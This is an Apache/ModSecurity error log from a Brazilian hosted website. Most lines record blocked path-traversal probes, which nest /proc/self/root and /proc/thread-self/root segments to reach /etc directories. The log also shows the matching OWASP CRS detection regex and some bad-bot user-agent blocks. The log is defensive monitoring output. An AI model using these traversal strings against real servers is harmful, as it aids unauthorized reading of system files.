[Wed Mar 18 15:09:39.407690 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:52150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqYwkwaGbbGflqUZBBSwAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:09:43.883195 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:46736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqZ9a6ubjKNq_cu4bMbgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:10:03.815670 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:56098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqe_u8EFLIOrSqIpswhgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:10:17.879676 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:58170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqifu8EFLIOrSqIpswoQAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:10:20.243268 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:59406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqi8df6f5d65gmYZQD6gAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:10:21.544204 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:59408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqjcdf6f5d65gmYZQD7QAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:10:38.997935 2026] [mime_magic:error] [pid 15051:tid 140411708356352] (70014)End of file found: [client 74.7.243.128:59424] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/user
[Wed Mar 18 15:11:09.381671 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.241.31:46742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqvSmAPhZkrhU8w4maygAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:11:13.921294 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:53456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqwew_le52K8_3pV0LMQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:12:04.944655 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.243.128:38870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrq9AbLMZ6AikZjR9XuYAAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:12:45.143679 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:38084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrrHcdf6f5d65gmYZQEkwAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:12:54.695605 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:34336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrrJgbLMZ6AikZjR9XuiAAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:12:55.979097 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:55546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrrJ-oXxyEfFpUF8f-j8wAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:13:43.852141 2026] [mime_magic:error] [pid 15826:tid 140411641214720] (70014)End of file found: [client 57.141.18.74:52698] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:13:52.497957 2026] [mime_magic:error] [pid 31803:tid 140411616036608] (70014)End of file found: [client 57.141.18.77:52862] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:13:54.977770 2026] [mime_magic:error] [pid 15051:tid 140411699963648] (70014)End of file found: [client 57.141.18.15:53094] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:13:55.499481 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:34106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrrY9a6ubjKNq_cu4bNEwAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:14:05.647286 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:47206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrrbQkwaGbbGflqUZBCWAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:14:33.327137 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.244.43:46524] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrriQbLMZ6AikZjR9XuxQAAAAA"]
[Wed Mar 18 15:14:40.589295 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.228.61:40070] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrrkOyqAr6etmhZHNr3zgAAAEE"]
[Wed Mar 18 15:17:06.035601 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:45434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrsIuw_le52K8_3pV0L_AAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:17:44.011934 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:43014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrsSOoXxyEfFpUF8f-k5AAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:18:31.659462 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:57452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrsd-w_le52K8_3pV0MPgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 15:18:37.477832 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:45586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrsfUzinOy1jxa1j4dMPAAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:18:54.953109 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.243.128:56046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrsjkzinOy1jxa1j4dMXAAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:18:55.163399 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:43348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrsj8df6f5d65gmYZQFSwAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
